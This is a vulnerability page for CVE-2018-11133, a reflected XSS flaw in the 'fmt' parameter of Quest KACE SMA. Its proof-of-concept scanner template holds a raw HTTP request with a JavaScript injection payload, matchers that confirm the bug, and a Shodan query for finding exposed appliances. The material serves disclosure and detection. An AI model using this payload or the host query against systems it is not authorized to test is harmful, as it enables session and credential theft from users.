CVE-2018-11133: Quest KACE SMA /common/run_cross_report.php 'fmt' XSS

2025-08-01 Quest KACE SMA PoC Public

Description

The 'fmt' parameter of the '/common/run_cross_report.php' script in the the Quest KACE System Management Appliance 8.0.318 is vulnerable to cross-site scripting.

PoC

id: CVE-2018-11133

info:
  name: Quest KACE SMA /common/run_cross_report.php 'fmt' XSS
  author: iamnoooob,pdresearch
  severity: medium
  description: |
    The 'fmt' parameter of the '/common/run_cross_report.php' script in the the Quest KACE System Management Appliance 8.0.318 is vulnerable to cross-site scripting.
  impact: |
    Attackers can execute arbitrary JavaScript in victims' browsers, potentially stealing session cookies, credentials, or performing actions on behalf of users.
  remediation: |
    Upgrade to a patched version of Quest KACE SMA or apply vendor-provided security updates.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2018-11133
    - https://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-11133
    cwe-id: CWE-79
    epss-score: 0.08743
    epss-percentile: 0.94881
    cpe: cpe:2.3:a:quest:kace_system_management_appliance:8.0.318:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: quest
    product: kace_system_management_appliance
    shodan-query: title:"KACE Systems Management"
  tags: cve,cve2018,xss,quest,kace,sma,vuln

http:
  - raw:
      - |
        GET /common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(document.domain)%2f%2f952 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "xls34403');alert(document.domain)//952');"
          - 'k-run-report-message'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022036f45a0cc18b44fde470a7016082d13faba0848a0fbccf0d62fad45919cae58c022042bf23ff7123b296c68236ed9f87612981371961c513130f021c4b482e8331f5:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities